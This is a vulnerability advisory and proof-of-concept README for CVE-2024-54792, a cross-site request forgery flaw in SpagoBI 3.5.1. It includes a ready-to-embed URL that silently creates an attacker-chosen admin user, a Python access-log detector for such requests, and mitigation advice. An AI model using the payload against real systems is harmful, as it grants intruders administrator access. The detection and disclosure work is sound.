
CVE-2024-54792 PoC — Engineering SpagoBI Cross-Site Request Forgery Vulnerability

Source
Associated Vulnerability
Title: Engineering SpagoBI Cross-Site Request Forgery Vulnerability (CVE-2024-54792)
Description: Engineering SpagoBI is an open-source business intelligence suite built on the J2EE framework by the Italian company Engineering. The suite is mainly used to manage BI objects such as reports, scorecards and data-mining models, and these BI objects can be controlled, checked, validated and distributed through the BI manager. Engineering SpagoBI 3.5.1 and earlier versions contain a security vulnerability: a cross-site request forgery flaw that allows an attacker to induce other users to perform unwanted actions.
Description
SpagoBI csrf
Readme
# CVE-2024-54792

**Severity :** **Medium** (**6.1**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` 

## Summary :
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.

## PoC
The add/edit/delete user panel, accessible by the admin user, does not contain CSRF countermeasures.
### Steps to Reproduce :
1. Embed this URL, customized with **victim_host**, **custom_username** and **custom_password**, in an HTML page that makes the request, and trick a victim with admin rights who is logged into the platform into visiting that page. A new user will be created in the platform.
```
https://<victim_host>/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=<custom_username>&fullName=<custom_username>&id=0&pwd=<custom_password>&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
```

## Affected Version Details :

- <= 3.5.1

## Impact :

Due to the lack of CSRF countermeasures, the attacker can trick a victim who is logged in with admin rights into unknowingly performing a GET request that inserts a user with attacker-chosen credentials into the platform. The attacker can then log in with those credentials.
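Because the forged request arrives as an ordinary GET on `AdapterHTTP`, the most practical signal in existing access logs is a state-changing `MANAGE_USER_ACTION` request whose `Referer` is absent or names a foreign origin. The detector below is an added example, not part of the PoC or of SpagoBI; it assumes combined-format access logs, a SpagoBI host of `bi.example.internal`, and constructed sample lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined/NCSA access-log line as written by Apache httpd or Tomcat's AccessLogValve.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# MESSAGE_DET values that change state under MANAGE_USER_ACTION; only USER_INSERT is in the advisory.
STATE_CHANGING = {"USER_INSERT"}

def is_user_mgmt(target):
    """True when the request target is a state-changing user-management call on AdapterHTTP."""
    parts = urlsplit(target)
    if not parts.path.endswith("/SpagoBI/servlet/AdapterHTTP"):
        return False
    q = parse_qs(parts.query)
    return (q.get("ACTION_NAME") == ["MANAGE_USER_ACTION"]
            and q.get("MESSAGE_DET", [""])[0] in STATE_CHANGING)

def referer_host(referer):
    """Hostname of the Referer, or None when the header was absent ('-')."""
    return None if referer in ("", "-") else urlsplit(referer).hostname

def find_suspicious(lines, expected_host):
    """Return (ip, user, target, reason) for user-management requests with a missing or foreign Referer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_user_mgmt(m["target"]):
            continue
        host = referer_host(m["referer"])
        if host is None:
            reason = "no Referer on a state-changing admin request"
        elif host.lower() != expected_host.lower():
            reason = "cross-origin Referer " + host
        else:
            continue  # same-origin: consistent with normal use of the admin UI
        hits.append((m["ip"], m["user"], m["target"], reason))
    return hits

# Constructed sample lines (not real traffic); bi.example.internal is the assumed SpagoBI host.
SAMPLE_LOG = [
    '10.0.0.5 - admin [24/Sep/2024:10:05:01 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=alice HTTP/1.1" 200 512 "https://bi.example.internal/SpagoBI/servlet/AdapterHTTP?PAGE=UserPage" "Mozilla/5.0"',
    '10.0.0.9 - admin [24/Sep/2024:10:07:44 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=newadmin HTTP/1.1" 200 512 "https://third-party.example/page.html" "Mozilla/5.0"',
    '10.0.0.9 - admin [24/Sep/2024:10:08:02 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=newadmin2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - bob [24/Sep/2024:10:09:10 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=EXECUTE_DOCUMENT_ACTION HTTP/1.1" 200 9000 "https://bi.example.internal/SpagoBI/" "Mozilla/5.0"',
]
```

An absent Referer is flagged as well, since a referrer policy on the embedding page can strip the header; this is a detection aid only, and the fix remains a server-side anti-CSRF token or upgrading as the Mitigation section says.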

## Mitigation :

- Update to the latest version.

File Snapshot

/data/pocs/c816e8797cded0824cb75cdb34b0cf5d6a314e11 (4.0K)
└── README.md (1.4K)
0 directories, 1 file